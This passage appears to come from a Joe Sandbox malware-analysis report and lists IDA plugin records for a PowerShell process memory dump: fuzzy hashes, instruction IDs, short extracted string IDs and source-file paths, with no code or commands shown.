                                                                  • Opcode Fuzzy Hash: 4be2c0776f4211424799a600c7983ec259291c1f3fdd0a2c5273d0cd64ae9e82
                                                                  • Instruction Fuzzy Hash: 6ED1B5B4A002199FCB14DB68C455BAEBBB2EF84301F14C469D90A6F795CF75EC42CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$$^q
                                                                  • API String ID: 0-4240210763
                                                                  • Opcode ID: efe084aba9b32928c5b5c61631a6470c195c32954f0ad5ea33140ed6257d5ab0
                                                                  • Instruction ID: 751ea59964780dc276c03c516ca6d9a90e86557aa32519822786772131ffec29
                                                                  • Opcode Fuzzy Hash: efe084aba9b32928c5b5c61631a6470c195c32954f0ad5ea33140ed6257d5ab0
                                                                  • Instruction Fuzzy Hash: 23D149F1B043568FCB158B78841926ABBE29F86321F1CC4AAD907CF391DE36D845C7A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$4'^q$4'^q
                                                                  • API String ID: 0-2555332335
                                                                  • Opcode ID: eada114a78782d5f3f68e1ca72e173cf1f8ad3db1e85a9882d4f4a4d1d90a93f
                                                                  • Instruction ID: f3d5f5c1b523e7e1047e8981c3b9dd186e7d74f2bd8e20301b9a3a4011a1dd17
                                                                  • Opcode Fuzzy Hash: eada114a78782d5f3f68e1ca72e173cf1f8ad3db1e85a9882d4f4a4d1d90a93f
                                                                  • Instruction Fuzzy Hash: CDF1A7F0A002299FDB24DB64C855B6ABBB3AF84305F14C4A5E90A6F781CB75AD81CF51
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$(f#l$(f#l
                                                                  • API String ID: 0-2541482469
                                                                  • Opcode ID: 0bf8e69e0b800326857c9bf279f43a1a961bb8b482ce70496b14a9182fb4818a
                                                                  • Instruction ID: 6c42383621ea91c03a065d8562e846a30af31adf410df644a7a04a3409f3be52
                                                                  • Opcode Fuzzy Hash: 0bf8e69e0b800326857c9bf279f43a1a961bb8b482ce70496b14a9182fb4818a
                                                                  • Instruction Fuzzy Hash: A1B17EF0A002159FC714DB68C545BAEBBE2AF89301F58C468E90A6B785DF36AC41CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$4'^q
                                                                  • API String ID: 0-1196845430
                                                                  • Opcode ID: 479b6d98b2880a6d10fbc0f7d01665749df317226bba1de4aeecb9a807034cfa
                                                                  • Instruction ID: 647f6dc665e4891e00e92b83f920cc9047c21c55268cbb2eb0a1403359b3dc56
                                                                  • Opcode Fuzzy Hash: 479b6d98b2880a6d10fbc0f7d01665749df317226bba1de4aeecb9a807034cfa
                                                                  • Instruction Fuzzy Hash: FEB19FB4A00215DFCB14CF68C455BA9BBB2EF88304F18C459E90A6F795CF36E846CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $^q$$^q$$^q
                                                                  • API String ID: 0-831282457
                                                                  • Opcode ID: 17ea5276afbedf89593335921501cf581bfe843081b83101cef352924d0040e9
                                                                  • Instruction ID: b71fa5996f17f7a18682bd3890b79e43d2000016af524ca36d0d020dc8f6b46d
                                                                  • Opcode Fuzzy Hash: 17ea5276afbedf89593335921501cf581bfe843081b83101cef352924d0040e9
                                                                  • Instruction Fuzzy Hash: D2214CB171030A5BDF28597A484A727B7D65BC1712F2C842A9A0BCF385DE36D4C28361
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$4'^q
                                                                  • API String ID: 0-1039660590
                                                                  • Opcode ID: 2526d9af8c1cbd3ce784636b2dce08a5a43e11dd9ee069cfbd8147a534118f38
                                                                  • Instruction ID: 70207bff1739590ccf378dbd6d5a00b6567804eee50b89026db1217cdcb62a12
                                                                  • Opcode Fuzzy Hash: 2526d9af8c1cbd3ce784636b2dce08a5a43e11dd9ee069cfbd8147a534118f38
                                                                  • Instruction Fuzzy Hash: A82261B4A00215DFD764CB18C845B69F7B2BF85314F58C095E94AAB392CB72ED81CF91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l
                                                                  • API String ID: 0-2952237724
                                                                  • Opcode ID: 9607e4b0231e4fa13326a447da01435775e2b482db43eef9d6a1a9d2c23a3d4c
                                                                  • Instruction ID: 2789b3b7f25432deadc098fb06dfe8cd8cefebf9ef231820fd09a1e4d940e946
                                                                  • Opcode Fuzzy Hash: 9607e4b0231e4fa13326a447da01435775e2b482db43eef9d6a1a9d2c23a3d4c
                                                                  • Instruction Fuzzy Hash: EEA192F0A002159FD714CB68C545BADBBB2EF89300F59C0A9E9067F796CB36AC41CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $^q$$^q
                                                                  • API String ID: 0-355816377
                                                                  • Opcode ID: 1d8d87f44e24d2f5f389e5392c9a24a5eacf23a12176bdd71ec52b85d0b7bc2a
                                                                  • Instruction ID: 5dc807845cc0927b115f1675df2e650baaf50645d718ba12800039e7395ba7be
                                                                  • Opcode Fuzzy Hash: 1d8d87f44e24d2f5f389e5392c9a24a5eacf23a12176bdd71ec52b85d0b7bc2a
                                                                  • Instruction Fuzzy Hash: A82138B16083896BDF25093A4849762BFA54F82651F2C80ABDE46CF387C939D885C371
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q
                                                                  • API String ID: 0-1614139903
                                                                  • Opcode ID: 0c8c1a01e18cd30ba9aa09995329102002680a07997525135009048c53f62eb7
                                                                  • Instruction ID: d5edca3064ae11762d4b4eafc3af64a334a927a67ca79d5f8c5cf9ff12c4ceb0
                                                                  • Opcode Fuzzy Hash: 0c8c1a01e18cd30ba9aa09995329102002680a07997525135009048c53f62eb7
                                                                  • Instruction Fuzzy Hash: BB1263B4B00209EFD714CB68C445BA9BBB2EF85315F58C069EA066F791C772EC46CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q
                                                                  • API String ID: 0-1614139903
                                                                  • Opcode ID: 47398f7274064743bf3df7a9e988f3590a03ce901895b569aa92ea90e9a6011d
                                                                  • Instruction ID: 1469e02088342e568043e9e45f5df5659592d35f157bff3e11bb2603b769f140
                                                                  • Opcode Fuzzy Hash: 47398f7274064743bf3df7a9e988f3590a03ce901895b569aa92ea90e9a6011d
                                                                  • Instruction Fuzzy Hash: FF0263B4B01209EFD714CB68C445AADFBB2AF86314F58C169E9066F391C772EC45CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q
                                                                  • API String ID: 0-1614139903
                                                                  • Opcode ID: f98d810136bd4c8a9d44069da08a7aa7e1a710aed036330f97d1d8ce6fe9efab
                                                                  • Instruction ID: 8ef82f8926932487d5b4a666ad78d7e809adf737c4d869cc6eb43463529ec0ec
                                                                  • Opcode Fuzzy Hash: f98d810136bd4c8a9d44069da08a7aa7e1a710aed036330f97d1d8ce6fe9efab
                                                                  • Instruction Fuzzy Hash: 0E41F6F0F043038FCB188F34C588B697BE2AF95264F1C80A5D9069B395DB35D945CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q
                                                                  • API String ID: 0-1614139903
                                                                  • Opcode ID: 84778ce9fce8a878f5e20206c3165f25e8e3cea31a1b310d067a8371ab6bb5e1
                                                                  • Instruction ID: ac89df8a03b9cdd129bf4a1800f4666acada4157ff69e28463753c7a11703671
                                                                  • Opcode Fuzzy Hash: 84778ce9fce8a878f5e20206c3165f25e8e3cea31a1b310d067a8371ab6bb5e1
                                                                  • Instruction Fuzzy Hash: C641C2F0B002179FCB14CE388558A6EBBE2EF95260F5C80B5D9069B351DB32DD44CBA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d645362f2633a332d85a01012e900a6cc4e16dda930641e343e45dd1fc2c6e7b
                                                                  • Instruction ID: 44bccea853ad386c2bccf708aefc8a4f4843a45dc83698d9ecc022b72a5a119f
                                                                  • Opcode Fuzzy Hash: d645362f2633a332d85a01012e900a6cc4e16dda930641e343e45dd1fc2c6e7b
                                                                  • Instruction Fuzzy Hash: 285137F1B052158FCB118EB8892966ABBE29FC6314F18C4B6D906DF341DA31D945C7A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 845e45ea767172e83176a3b22024769d44723bf721d6d7229e8a5fd13f3e61ea
                                                                  • Instruction ID: 0e1d0f212f8cbe776d76d9901887c5189835a219a7f563c9a5e4128a33211deb
                                                                  • Opcode Fuzzy Hash: 845e45ea767172e83176a3b22024769d44723bf721d6d7229e8a5fd13f3e61ea
                                                                  • Instruction Fuzzy Hash: 843145F1B06212CFCB218EB4861967ABBA2AF85314F0CC4B6D906DF351E731D845CBA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4ac4af68207f2e8025cdb391dfd61bf90d91608d4b1c4541031b13ae795c09fd
                                                                  • Instruction ID: 28405871adf632e75c2f4871232eeae59753754c29b918fc2dc3da25a3d59f92
                                                                  • Opcode Fuzzy Hash: 4ac4af68207f2e8025cdb391dfd61bf90d91608d4b1c4541031b13ae795c09fd
                                                                  • Instruction Fuzzy Hash: 4331A5B4740214AFD7149B64C815BAEBBA3EFC4300F14C469EA066F781CF76AC418BA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a795c87a955bde87d6b8738b59614cf12631c7a0c521e2be33eba6c03d3ea908
                                                                  • Instruction ID: 504ab2c15b28573581fe0f455748590510ecce39114fe93b1a2a51313c6b3d21
                                                                  • Opcode Fuzzy Hash: a795c87a955bde87d6b8738b59614cf12631c7a0c521e2be33eba6c03d3ea908
                                                                  • Instruction Fuzzy Hash: C8213AB57003196BCF245A7B884973BBAC69BC5711F18C82AD54BDB380DE76D9C5C360
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e7a12446433526006c3af912c0bb207d1ddca3c04e21ce23873e3e86da4d155
                                                                  • Instruction ID: de8e1707deab001f518befc683b8fbe2742040950729b864ecaf47551ac99f73
                                                                  • Opcode Fuzzy Hash: 0e7a12446433526006c3af912c0bb207d1ddca3c04e21ce23873e3e86da4d155
                                                                  • Instruction Fuzzy Hash: 152167B57083893BDB100A7688087367F969F86701F2CC46AD94ADF2C2C97AD9C8C361
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0fa18e883e5423db9770f17e38f040a536876cedcd31978cd9c3e988e8cdf743
                                                                  • Instruction ID: fb3e8fb3869537c6d1f3ad62b9e38e90dbea90662895775193bd2da40ea2da31
                                                                  • Opcode Fuzzy Hash: 0fa18e883e5423db9770f17e38f040a536876cedcd31978cd9c3e988e8cdf743
                                                                  • Instruction Fuzzy Hash: 1001F77631031A9BCF2495BAD40457BB7D5DBC5622F18C43ED95ACB740DA32C886CF60
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6f6c4d2c4e78bcbceca7a2f13b8d894b723a1a8db736b52b4d3cba1a66d0e8a7
                                                                  • Instruction ID: fb3348a7a9313b1fd602483a71e861d5799c126d066fdcff3ddf225dbe9651e4
                                                                  • Opcode Fuzzy Hash: 6f6c4d2c4e78bcbceca7a2f13b8d894b723a1a8db736b52b4d3cba1a66d0e8a7
                                                                  • Instruction Fuzzy Hash: 2DF015742492828FC726CB60C868A10BB71BF42214F2DC0D7D0468F2A7C7369C46C751
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bd734db175e7a23bdbc239a27e74baddb7422c6ad7d2807ff114c97d0b2a5216
                                                                  • Instruction ID: bbebe3e70b0b316b31cb50a3880aabddbfe51b6eef3401187925cac5f214edcb
                                                                  • Opcode Fuzzy Hash: bd734db175e7a23bdbc239a27e74baddb7422c6ad7d2807ff114c97d0b2a5216
                                                                  • Instruction Fuzzy Hash: D5F01C705093C19FD702CB25C8A5A11BB72AF82214F1EC0DB904A8F3A3D736D846CB11
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$84!l$84!l$d%dq$d%dq$d%dq$d%dq$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                                  • API String ID: 0-661363863
                                                                  • Opcode ID: d1b66894d428c7e95fefd862bda25561256b00da7ce47d1f6803f8441a766a96
                                                                  • Instruction ID: 31266ca0fa5fb705543e2aa8be0e2c48c21d90d34c65844b16988361db527e0f
                                                                  • Opcode Fuzzy Hash: d1b66894d428c7e95fefd862bda25561256b00da7ce47d1f6803f8441a766a96
                                                                  • Instruction Fuzzy Hash: FEC1F6F1B1421A9FCB258F79C41967EBBE2AF85711F1C846AD906CB341DB31D842C7A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                  • API String ID: 0-3512890053
                                                                  • Opcode ID: 415eff2d590eebf94a3f5be29a10169537f5ec6034d254b67bac97358de0aa1e
                                                                  • Instruction ID: 4005cacbb23ad58243f35ad7af37d32c4dbfe898edde1ae60a13d9e37b472494
                                                                  • Opcode Fuzzy Hash: 415eff2d590eebf94a3f5be29a10169537f5ec6034d254b67bac97358de0aa1e
                                                                  • Instruction Fuzzy Hash: 92A107F1B142568FCB254B38C4B867ABBE1BF86251F1884BAD846CB351DF35C885C7A1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$84!l$84!l$U$tP^q$tP^q$$^q$(dq$(dq$(dq
                                                                  • API String ID: 0-984918672
                                                                  • Opcode ID: 6375f97018cd48e233d9d1dc3942a2eccabc56f9e3bb11b087f089effe95f9ea
                                                                  • Instruction ID: 725f52694e77fcf3e57bf13a9ae91b161596803e8a5735a4a08163af524f322d
                                                                  • Opcode Fuzzy Hash: 6375f97018cd48e233d9d1dc3942a2eccabc56f9e3bb11b087f089effe95f9ea
                                                                  • Instruction Fuzzy Hash: 2771B2B0B00256DFDB24CE29C548B6ABBF2AF85315F1D8459E806AF391C771DD81CBA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$84!l$84!l$tP^q$tP^q$$^q$(dq$(dq$(dq
                                                                  • API String ID: 0-979784629
                                                                  • Opcode ID: ed9d8c409c6ad43ec1edf2459cce0a873d0cf1cafdd02c5bc7280a955ce88448
                                                                  • Instruction ID: 831e525ef790af85d30e2cf6249e62d2b7a8583ded0084fb5de3e14eb2f5dc32
                                                                  • Opcode Fuzzy Hash: ed9d8c409c6ad43ec1edf2459cce0a873d0cf1cafdd02c5bc7280a955ce88448
                                                                  • Instruction Fuzzy Hash: 006193F0B00216DFDB24CE29C548B6AB7F2AF85715F1D8459E806AB391C771ED41CBA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$t~qq$$^q$$^q$$^q
                                                                  • API String ID: 0-1719666192
                                                                  • Opcode ID: 0fef62abc72b09f56002b33d02e6dc45644d476943aea8e7e98475971a0077fc
                                                                  • Instruction ID: 3d1bd66a5319e21688cb563fd1cd323fd46ceb1514d91a419fd8e2a9bb393039
                                                                  • Opcode Fuzzy Hash: 0fef62abc72b09f56002b33d02e6dc45644d476943aea8e7e98475971a0077fc
                                                                  • Instruction Fuzzy Hash: 39D12AB1B0421A9FCB189F7984542AAFBE2BFC6311F18C56AD64ACB341DF31C946C791
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (f#l$(f#l$(f#l$(f#l$4'^q$4'^q$4 l$4 l
                                                                  • API String ID: 0-2933226611
                                                                  • Opcode ID: cd6fe4cb265d2f2908a65e005401bc995af8bd2688ad3cfdf16afe82836e4e5c
                                                                  • Instruction ID: 61f9b8df8d6a718d5d521053907230423cbd0ece617f8e3c07a97ffcc56c1a20
                                                                  • Opcode Fuzzy Hash: cd6fe4cb265d2f2908a65e005401bc995af8bd2688ad3cfdf16afe82836e4e5c
                                                                  • Instruction Fuzzy Hash: 6F6182F0B102159FCB14CB68C455A6ABBE3BF88312F188469DD0AAB754CB37EC41CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$84!l$TQcq$TQcq$tP^q$$^q$$^q$$^q
                                                                  • API String ID: 0-2331792618
                                                                  • Opcode ID: 6fbfa27c4b7fb9301474fa9b87902511b93f20367832ee5a6a6aae568fe83603
                                                                  • Instruction ID: 9e89cd4e7df3998c602b2487f5a5a6a8abf44c4d5c40284cddcae356484d28d2
                                                                  • Opcode Fuzzy Hash: 6fbfa27c4b7fb9301474fa9b87902511b93f20367832ee5a6a6aae568fe83603
                                                                  • Instruction Fuzzy Hash: 8751C2B0700216DFDB24CE25C54CBAAB7A2BB46311F5C84AAE8179B394C775EC49CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                                                                  • API String ID: 0-1608119003
                                                                  • Opcode ID: ebcca76bbe51f0a13a817b6819d722310c0d0bf82de0adc8a1027788c4582d76
                                                                  • Instruction ID: 0255364f825ce7c7c4fed638c8c2b21306babe7b3c9e2c6937178209600e9077
                                                                  • Opcode Fuzzy Hash: ebcca76bbe51f0a13a817b6819d722310c0d0bf82de0adc8a1027788c4582d76
                                                                  • Instruction Fuzzy Hash: 34F12BB2B043559FCB148A7884196AAFBF1AFC6311F1CC46AD94BCB351DB31E845CB91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$84!l$d%dq$d%dq$d%dq$tP^q$$^q
                                                                  • API String ID: 0-3145875699
                                                                  • Opcode ID: 7088bb491e955ee634eaacf670708b72622942582a58b2e2b26886b349160849
                                                                  • Instruction ID: 3265ff34cc663d88503c042df79cc1f7e1cc9ef711ea41a66a455604a9b62536
                                                                  • Opcode Fuzzy Hash: 7088bb491e955ee634eaacf670708b72622942582a58b2e2b26886b349160849
                                                                  • Instruction Fuzzy Hash: BB51E0F5A802059FDB288F24C458BBEBBE2AF45750F1C8096E9069B391CB31DD41CBB1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$84!l$d%dq$d%dq$d%dq$tP^q$$^q
                                                                  • API String ID: 0-3145875699
                                                                  • Opcode ID: 18a210baeeec754b6a2177fcf37972c846f7d8b26876519d6dcf9bccc96d8bba
                                                                  • Instruction ID: 3f6e38770ed09790260b30def9b0cdcd01fe85bd295e2babbcabf50859e1f45b
                                                                  • Opcode Fuzzy Hash: 18a210baeeec754b6a2177fcf37972c846f7d8b26876519d6dcf9bccc96d8bba
                                                                  • Instruction Fuzzy Hash: 7F51E3F1A843469FDB258F34C45867EBBA2AF42640F1C8496E9478F391CB31D941CBB2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                                                                  • API String ID: 0-3669853574
                                                                  • Opcode ID: 31bfc8fc49f44efc73299fdbfcaa6a2c5b854070480540bcf06dc66e57d38177
                                                                  • Instruction ID: 6d1ec3baa7e945acf99b2a85754bd10289325d32d191bc2c9fbb3a08c2aefc75
                                                                  • Opcode Fuzzy Hash: 31bfc8fc49f44efc73299fdbfcaa6a2c5b854070480540bcf06dc66e57d38177
                                                                  • Instruction Fuzzy Hash: F061D3B1B542198FCB288E79C4086BEB7E2AB85311F18C47AD84B8B351DB31C846C7B1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$84!l$d%dq$d%dq$d%dq$tP^q
                                                                  • API String ID: 0-2951483478
                                                                  • Opcode ID: e11b3d9e365b19af627007c4ffed82e639509a5c6d2417f89dc0a41f82c45a6e
                                                                  • Instruction ID: a0982a46bf5a14741180e8927968950aa6a34556a07999d0106b57930c675e3f
                                                                  • Opcode Fuzzy Hash: e11b3d9e365b19af627007c4ffed82e639509a5c6d2417f89dc0a41f82c45a6e
                                                                  • Instruction Fuzzy Hash: 59318FB5A402159FCB14DF68C458A6EFBE2BF88710F29C555E90AAB341C731DC41CBA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2177720422.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7610000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'^q$4'^q$tP^q$tP^q
